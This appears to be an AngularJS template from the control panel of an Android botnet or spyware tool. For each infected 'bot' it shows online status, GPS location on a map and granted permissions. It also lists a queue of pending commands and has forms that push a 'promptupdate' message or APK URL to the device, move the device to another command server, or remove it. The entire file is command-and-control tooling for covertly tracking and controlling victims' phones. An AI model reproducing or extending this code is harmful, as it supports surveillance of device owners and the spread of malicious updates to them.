<h1>
  <span ng-show="!bot.updated">{{bot.device}}</span>
  <span class="text-success" ng-show="bot.status && bot.updated">{{bot.device}} (online)</span>
  <span class="text-danger" ng-show="!bot.status && bot.updated">{{bot.device}} (offline)</span>
</h1>
<p>Last seen {{bot.updated | amCalendar:referenceTime:formats}}</p>
<!-- <p class="text-success" ng-show="bot.status">ONLINE</p>
<p class="text-danger" ng-show="!bot.status">OFFLINE</p> -->
<uib-tabset active="active">
  <uib-tab index="0" heading="Location">
    <div class="map-view">
      <ui-gmap-google-map center='map.center' zoom='map.zoom' draggable="true">
        <ui-gmap-marker idKey='bot.id' coords='{latitude: bot.lat, longitude: bot.longi}'>
        </ui-gmap-marker>
      </ui-gmap-google-map>
    </div>
  </uib-tab>
  <uib-tab index="4" heading="Permissions">
    <table class="table" ng-show="permissions.length > 0">
      <thead>
        <tr>
          <th>Permission</th>
          <th>Status</th>
        </tr>
      </thead>
      <tbody>
        <tr ng-repeat="perm in permissions">
          <td>{{perm.permission}}</td>
          <td>
            <span class="text-success" ng-if="perm.granted">Granted</span>
            <span class="text-danger" ng-if="!perm.granted">Denied</span>
          </td>
        </tr>
      </tbody>
    </table>
    <b ng-show="permissions.length === 0">No info to show</b>
  </uib-tab>
  <uib-tab index="5" heading="Pending Commands">
    <div class="list-group">
      <div class="list-group-item" ng-repeat="cmd in pendingCommands">
        {{cmd.command}}
        <a class="btn btn-danger btn-sm" ng-click="deleteCommand(cmd.id)">&times;</a>
      </div>
      <p ng-show="pendingCommands.length === 0">No pending commands</p>
    </div>
  </uib-tab>
  <uib-tab index="6" heading="Settings">
    <form name="updateApkForm">
      <div class="form-group">
        <label>Personal Message</label>
        <textarea placeholder="Type message" class="form-control" type="text" ng-model="update_url" name="text_message" rows="5" required=""></textarea>
      </div>
      <div class="form-group">
        <button ng-disabled="updateApkForm.$invalid" class="btn btn-primary" ng-click="addCommand('promptupdate', update_url)">Send</button>
      </div>
    </form>
    <hr>
    <form name="transferBotForm">
      <div class="form-group ">
        <label>Transfer device to new server</label>
        <input class=" form-control" placeholder="URL of new server" type="url" name="apkUrl" ng-model="server_url" required>
      </div>
      <div class="form-group">
        <button ng-disabled="transferBotForm.$invalid" class="btn btn-primary" ng-click="addCommand('transferbot', server_url)">Transfer</button>
      </div>
    </form>
    <hr>
    <a ng-click="removeDevice(bot)" class="btn btn-danger">Remove Device</a>
  </uib-tab>
</uib-tabset>
